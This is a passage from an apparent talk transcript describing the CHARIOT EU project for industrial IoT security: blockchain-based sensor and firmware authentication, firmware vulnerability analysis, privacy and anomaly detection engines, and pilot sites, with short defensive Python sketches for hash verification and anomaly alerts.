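print(gateway_accept("sensor-42", reading, sig))      # True
print(gateway_accept("sensor-42", b"tampered", sig))  # False -> reject the message
```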
So, there is a layer where we check the software produced for IoT devices at source code level, and we detect vulnerabilities like stack overflows, like buffer underruns, these kinds of things that can lead to vulnerabilities or enable hackers to do malicious actions, etc. And we verify this through hashing mechanisms via blockchain, so we secure the transmission of the actual developed firmware to the IoT device to be updated. And during the update of this firmware, we also perform an analysis of its binary code at execution level, which means that we are checking the actual binary, the executable file, for various vulnerabilities that may be present in the firmware, like code injections, invalid pointers inside the binary, or malicious pointers pointing to injected code, etc. That's the reason behind it. A different layer in CHARIOT is the intelligence layer that we provide, and this includes data analytics and three different engines. The first one is the privacy engine, which ensures that no private information is circulated inside the IoT network. We're using several analytics techniques to identify these privacy issues; in other words, we detect sensitive data and personal data inside the sensor communications. Then there is the safety supervision engine, which is responsible for predicting and detecting anomalies based on machine learning methodologies. This is based on neural networks, and it also supports user-defined models. We're also providing, as a safety supervision engine component, an IoT language that allows us to manage the network configuration in a dynamic approach. Through this we can describe access control mechanisms, rules and limitations; we can import different layers of rules and define the topology of the network. Finally, we're using predictive analytics algorithms to highlight any out-of-bounds behaviours, any flow of information or data that is not following a normal or expected behaviour. Of course this could be due to malicious actions in the network or a faulty sensor. And finally we have a platform and various user interfaces supporting the above three major components. The core of the CHARIOT project is a platform, what we call the CHARIOT platform. This is the orchestrating mechanism for data ingestion, essentially the ingestion, management, storage and normalization of data, and the external connectivities to interface with the existing infrastructures and the data management systems that they already have. It is the CHARIOT platform that is responsible for managing the machine learning models, so it's where the actual engines and the analytics are running. We also support this with a device management dashboard and an operational dashboard; these are two distinct dashboards. The first one is for handling sensor registration and updates; it is more of a user interface and quite simplistic, providing the capability to set up the network, to configure the sensors, to include or remove new sensors, etc. 
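A minimal sketch of the hash-based firmware integrity idea described here, assuming for illustration that the trusted hash recorded at build time is available to the verifying side. This simplifies the blockchain-backed mechanism to a local dictionary; the file name, version strings, and helper names are hypothetical.

```python
import hashlib

# Hypothetical stand-in for the ledger: firmware version -> hash recorded at build time.
trusted_hashes: dict[str, str] = {}

def sha256_of(firmware: bytes) -> str:
    return hashlib.sha256(firmware).hexdigest()

def record_build(version: str, firmware: bytes) -> None:
    """Build-pipeline side: record the hash of the compiled firmware image."""
    trusted_hashes[version] = sha256_of(firmware)

def verify_before_flash(version: str, received: bytes) -> bool:
    """Device/gateway side: only accept firmware whose hash matches the recorded one."""
    return trusted_hashes.get(version) == sha256_of(received)

image = b"\x7fELF...compiled firmware bytes..."
record_build("door-controller-1.4.3", image)
print(verify_before_flash("door-controller-1.4.3", image))            # True
print(verify_before_flash("door-controller-1.4.3", image + b"\x00"))  # False -> reject update
```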
The operational dashboard, on the other side, is more on the technical side, again designed for the requirements of end users but providing more information on the platform health, performance monitoring, handling of alerts, and sensor data visualization. And this is this side of the story. It provides data, it creates what-if scenarios, it is very helpful to simulate different security incidents, and it was also very useful for us to test and validate the system with data, and also to create an incident in an infrastructure. So, the challenges that have driven us here can be seen in the next slides. The major challenge is eavesdropping, interception and hijacking of devices. By this we mean man-in-the-middle attacks, hijacking of protocols, network interventions, these kinds of things that are very common and very much prioritized. This list that you will see in these slides is based on a recent report. So we secure the communication protocols between the devices with encrypted communications, and there is a strong presence of blockchain in this, for the registration and affirmation of the data and of the sensors in the network; blockchain is used heavily for sensor and gateway authentication. Sensor provisioning is done following modern commercial approaches. And of course, modernized and user-friendly dashboard configurations for sensor configuration, management, alerting, things like this. The second challenge that is present in IoT devices is nefarious activities. In this we include malware, denial of service instances, software and hardware information manipulation, targeted attacks, abuse of personal data, brute force attacks, these kinds of attacks. For this we have developed the firmware static and binary checking and analysis; these are the two levels that I described before for the firmware running on the device. We perform firmware hashing: we have developed the mechanism for trusting the whole development lifecycle, meaning starting from the source code, you write the code, you compile the code, and this is safely stored in the blockchain through a hashing mechanism. So you are sure that the firmware developed and compiled by the software engineer is actually the one that is transmitted to the device. And this is very, very important so that we can enhance the trust that the infrastructures have in the firmware running on their devices, whatever they are. This includes of course the sensor registration mechanisms and the flagging of personal data, as I said before, and these again are supported by dashboard mechanisms to support the end user with a user interface. And of course we should not forget accidental or intentional damages. These could be due to mistakes of the personnel, or to intentional or unintentional configuration changes. For this, again, we are providing the mechanisms for the data ingestion, management, storage and normalization, and we also provide the machine learning anomaly detection, which will detect any unexpected behaviour of a sensor or of the data coming and going inside the network. The language that we have developed is also helping us in this direction, providing the configuration of the network, control rules, etc. 
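The project's safety supervision engine is described as neural-network based, but the core idea of flagging out-of-bounds sensor behaviour can be illustrated with a much simpler statistical sketch; the window size and threshold below are arbitrary assumptions, not CHARIOT parameters.

```python
from collections import deque
from statistics import mean, stdev

class AnomalyDetector:
    """Flag readings that deviate strongly from a rolling baseline (z-score test)."""

    def __init__(self, window: int = 50, threshold: float = 4.0):
        self.history = deque(maxlen=window)
        self.threshold = threshold

    def check(self, value: float) -> bool:
        """Return True if the reading looks anomalous given recent history."""
        anomalous = False
        if len(self.history) >= 10:
            mu, sigma = mean(self.history), stdev(self.history)
            if sigma > 0 and abs(value - mu) / sigma > self.threshold:
                anomalous = True
        if not anomalous:
            self.history.append(value)  # only learn from readings considered normal
        return anomalous

detector = AnomalyDetector()
for v in [21.0, 21.2, 20.9, 21.1, 21.0, 21.3, 20.8, 21.1, 21.0, 21.2, 95.0]:
    if detector.check(v):
        print("alert: unexpected sensor behaviour ->", v)
```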
Again this is integrated fully into the dashboard solution, so there is a simple interface for the user to connect and play with the network. And finally there are some other categories that CHARIOT is also aligned to; here we're talking about failures or actual malfunctions of devices, legal implications, even physical attacks. Starting bottom up: physical attacks are not the major scope of CHARIOT, as you can understand, this is more infrastructure related and not in the scope of CHARIOT; however, a malfunctioning of devices will be detected by the CHARIOT solution. On the failure side and the legal side there are the machine learning anomaly detection techniques, predictive analytics, but also the safety platform that is detecting any personal information, so we avoid the legal implications in the IoT network and infrastructure. So, closing: the three cases that I described before are the smart campus at IBM, a rail case at Trenitalia, and the Athens International Airport. You can see a summary of what their needs actually are right now. In the smart campus we had to cope with challenges on the utilization of sensor data during a fire or a hazard event, checking for security problems in the binary firmware, so what happens to the firmware when you update it on the device, encrypting the readings of the sensors used in the buildings, and being sensitive to data privacy inside the smart campus. In Italy, the situation was similar but not exactly the same, as we had to deal with a rail environment, a harder environment, where early detection was of primary importance, of either anomalous or unauthorized devices entering the network, with the ultimate scope of early alerting for any potential security violation and notifying the security manager of the rail operator. In the Athens International Airport, as you can imagine, there are similar cases of facility IoT devices that are involved in physical and cyber threats and the detection of anomalous operations there. Of major importance in the airport is, of course, the users' safety, the people that are flying, to ensure that both their personal safety and the infrastructure safety are compliant with the standards required. The comfort and safety of the passengers and the people there was the primary scope here, and of course guaranteeing and trusting the sensor data was the key point at this stage. So, we are closing. A quick update on the status of the project: we have completed the technical developments and the integration and deployment, and we are right now in the validation stage of the platform and the different components. We are following an iterative system design, which means that we have already collected some information from the end users as feedback, and we have improved the technical developments that we finally apply to the three infrastructures. The project is finishing by the end of the year, so we are in the validation stage right now. That's it from my side; I have exceeded the time slightly, sorry about this.
|
The CHARIOT H2020 (IoT) project (Cognitive Heterogeneous Architecture for Industrial IoT), integrates a state-of-the-art inclusive solution for the security, safety and privacy assurance of data in industrial networks. The solution is based on an integrated approach for IoT devices lifecycle management (based on blockchain and public key infrastructure technologies), IoT firmware development and deployment (source and binary level vulnerability analyses), data analytics (privacy by design, sensitive data detection, dynamic network configurations etc.) and a set of user interfaces for management and control of the network, devices and the CHARIOT platform. CHARIOT is funded by the H2020 programme under the IoT topic, has a 3-year duration and concludes its activities by the end of 2020.
|